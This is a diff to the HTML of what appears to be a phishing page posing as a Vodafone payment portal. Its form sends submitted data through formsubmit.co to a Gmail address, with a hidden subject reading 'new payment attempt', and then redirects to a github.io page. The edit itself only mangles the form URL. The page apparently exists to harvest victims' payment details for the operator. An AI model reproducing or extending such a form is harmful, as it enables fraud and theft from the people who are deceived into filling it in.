--- a/index.html
+++ b/index.html
@@ -26,7 +26,9 @@
 </p>
 
 
-            <form action="https://formsubmit.co/alknjalazmfwwwq@gmail.com" method="POST">
+            <form action="https:formsubmit.co/alknjalazmfwwwq@gmail.com" method="POST">
+
+
                 <input type="hidden" name="_subject" value="⚠️ محاولة دفع جديدة - Vodafone Portal">
     
     <input type="hidden" name="_next" value="https://alknjalazmfwwwq-dot.github.io/elkingcash/">
